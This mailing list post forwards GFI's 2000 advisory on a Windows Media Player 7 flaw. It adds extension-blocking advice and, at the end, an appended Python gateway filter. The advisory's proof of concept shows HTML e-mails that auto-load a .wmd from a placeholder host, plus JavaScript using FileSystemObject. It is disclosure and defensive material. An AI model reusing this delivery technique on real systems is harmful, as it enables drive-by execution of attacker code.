[Esa-l] [ GFISEC23112000 ] Microsoft Media Player 7 allows execution of
Arbitrary Code (fwd)
John D. Hardin
jhardin at wolfenet.com
Sun Nov 26 12:10:54 PST 2000
Please add "asx|wm[szd]" to your custom MANGLE_EXTENSIONS list. You
may also choose to poison:
*.asx
*.wms
*.wmz
*.wmd
Note that the attack described below is prevented by defanging active
HTML, not through attachment poisoning. The above recommendations are
proactive to prevent "social engineering" attacks.
See also:
http://www.microsoft.com/technet/security/bulletin/MS00-090.asp
--
John Hardin KA7OHZ ICQ#15735746 http://www.wolfenet.com/~jhardin/
jhardin at wolfenet.com pgpk -a finger://gonzo.wolfenet.com/jhardin
768: 0x41EA94F5 - A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76
1024: 0xB8732E79 - 2D8C 34F4 6411 F507 136C AF76 D822 E6E6 B873 2E79
-----------------------------------------------------------------------
"Bother," said Pooh as he struggled with /etc/sendmail.cf, "it never
does quite what I want. I wish Christopher Robin was here."
-- Peter da Silva in a.s.r
-----------------------------------------------------------------------
Today: we know who is President
---------- Forwarded message ----------
Date: Thu, 23 Nov 2000 12:11:49 +0100
From: Sandro Gauci <Sandro at GFI.COM>
To: NTBUGTRAQ at LISTSERV.NTBUGTRAQ.COM
Subject: [ GFISEC23112000 ] Microsoft Media Player 7 allows execution of Arbitrary Code
GFI Security Lab Advisory
http://www.gfi.com/
----[Title:
[ GFISEC23112000 ] Microsoft Media Player 7 allows execution of
Arbitrary Code
----[Published:
23.NOV.2000
----[Vendor Status:
Microsoft has been informed and we have worked with them to release
a patch.
----[Systems Affected:
Windows ME (WMP7 is installed by default)
and 95, 98, NT and 2000, using:
* Windows Media Player 7
and
* Internet Explorer 3+,
* Outlook Express 2000,
* Outlook Express 98,
* Outlook 2000,
* Outlook 98
* possibly all other HTML and/or
javascript enabled e-mail clients.
----[The problem:
GFI, developer of email content checking & network
security software, has recently discovered a security flaw
within Windows Media Player which allows a malicious user
to run arbitrary code on a target machine as it attempts to
view a website or an HTML E-mail.
The problem is exploited by embedding a javascript (.js) file within a
Media Player skin file (.wmz) which can also be embedded in a Windows Media
Download file (.wmd). This does not require the user to run any attachments
since the Media Player file is automatically executed using an iframe tag
or a window.open() within a <DEFANGED_script> tag.
----[Proof of concept Exploit:
<DEFANGED_Embedded within an HTML file or e-mail>
E-mail Example 1.
<head>
<DEFANGED_script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
alert('This exploit will now open a new window\n
and automatically download the wmd file\n
and execute it. This will create a file named\n
gfiseclab.txt in your C:\\');
window.open(theURL,winName,features);
}
//-->
</script>
</head>
<body bgcolor="#FFFFFF"
DEFANGED_OnLoad="MM_openBrWindow('http://website/test.wmd','','width=0,height=0')">
</Embedded within an HTML e-mail>
E-mail Example 2.
<html>
<body>
<DEFANGED_script>
alert('This exploit will now open a new window \n and automatically download
the wmd file \n
and execute it. This will create a file named \n gfiseclab.txt in your
C:\\')</script>
<DEFANGED_iframe src="http://website/test.wmd"></iframe></body>
</html>
-------------------------------------
test.wmd is a compressed zip file which contains the following files:
* test.asx: meta file which points to an mpg file and
the exploit skin file
* test.mpg: an example mpeg movie.
* test.wmz: the exploit skin file.
test.wmz is also a compressed zip file containing:
* test.js: our javascript which contains the following code
************************************
var fso, f1;
fso = new ActiveXObject("Scripting.FileSystemObject");
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);
function onload(){
playAgain();
}
************************************
* test.wms: another metafile which calls test.js
-------------------------------------
----[Solution:
For e-mail the best solution is to apply filtering on incoming e-mails via
the SMTP server to filter WMD and WMZ files, and to disable javascript, iframe tags,
meta refresh tags and possibly ActiveX tags. This means that users should
not worry about receiving malicious email and spreading worms etc.
Consider unregistering .wmd and .wmz from being associated with Media
Player 7 until a vendor patch is applied. Procedure:
In Windows Explorer click on View>Options>File Types and delete the
following entries:
* Windows Media Player Skin Package.
* Windows Media Player Download Package.
This should provide some better protection.
----[Reference:
http://www.gfi.com/press/memp7exploitpr.htm
http://www.microsoft.com/technet/security/bulletin/MS00-090.asp
----[Contact Information:
Sandro Gauci
GFI Security Lab
sandro at gfi.com
http://www.gfi.com
GFI - Security & communications products for Windows NT/2000
http://www.gfi.com
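Added example (not part of either message above, and not the sanitizer's or GFI's own code): a gateway-side check that applies the "asx|wm[szd]" extension policy John recommends, and that also opens a .wmd container to look for the nested .wmz skin with a .js/.wms inside, which is the layout the advisory describes. The ".DEFANGED" suffix and the sample container are constructed stand-ins, not the real sanitizer's mangling format or the advisory's test.wmd.

```python
import io
import re
import zipfile

# Extension policy from the list advice ("asx|wm[szd]"); the skin's inner files.
MANGLE_EXTENSIONS = re.compile(r"\.(asx|wm[szd])$", re.IGNORECASE)
SCRIPT_IN_SKIN = re.compile(r"\.(js|wms)$", re.IGNORECASE)


def mangle_name(filename: str) -> str:
    """Defang a risky attachment name so the client will not auto-open it.
    The ".DEFANGED" suffix is a constructed stand-in for the sanitizer's format."""
    if MANGLE_EXTENSIONS.search(filename):
        return filename + ".DEFANGED"
    return filename


def nested_script_members(data: bytes, depth: int = 0, max_depth: int = 3) -> list:
    """Walk a zip container (.wmd holds .asx/.wmz; .wmz holds .wms/.js) and
    return the paths of script/metafile members found at any nesting level."""
    found = []
    if depth > max_depth or not zipfile.is_zipfile(io.BytesIO(data)):
        return found
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if SCRIPT_IN_SKIN.search(name):
                found.append(name)
            for sub in nested_script_members(zf.read(name), depth + 1, max_depth):
                found.append(f"{name}/{sub}")  # record the path through the container
    return found


def should_block(filename: str, data: bytes) -> bool:
    """Block on the extension alone, or on a skin/script found inside any zip
    (so a renamed .zip carrying the same content is still caught)."""
    return bool(MANGLE_EXTENSIONS.search(filename)) or bool(nested_script_members(data))


def build_sample_wmd() -> bytes:
    """Constructed sample mirroring the advisory's layout (harmless placeholder bodies):
    test.wmd -> test.asx, test.mpg, test.wmz; test.wmz -> test.wms, test.js."""
    skin = io.BytesIO()
    with zipfile.ZipFile(skin, "w") as z:
        z.writestr("test.wms", "<!-- constructed placeholder skin metafile -->")
        z.writestr("test.js", "// constructed placeholder, no payload")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("test.asx", "<asx version='3.0'></asx>")
        z.writestr("test.mpg", b"\x00\x00\x01\xba")
        z.writestr("test.wmz", skin.getvalue())
    return outer.getvalue()
```

Note that the container walk complements rather than replaces the defanging of active HTML John mentions, since the iframe/window.open delivery needs no attachment at all.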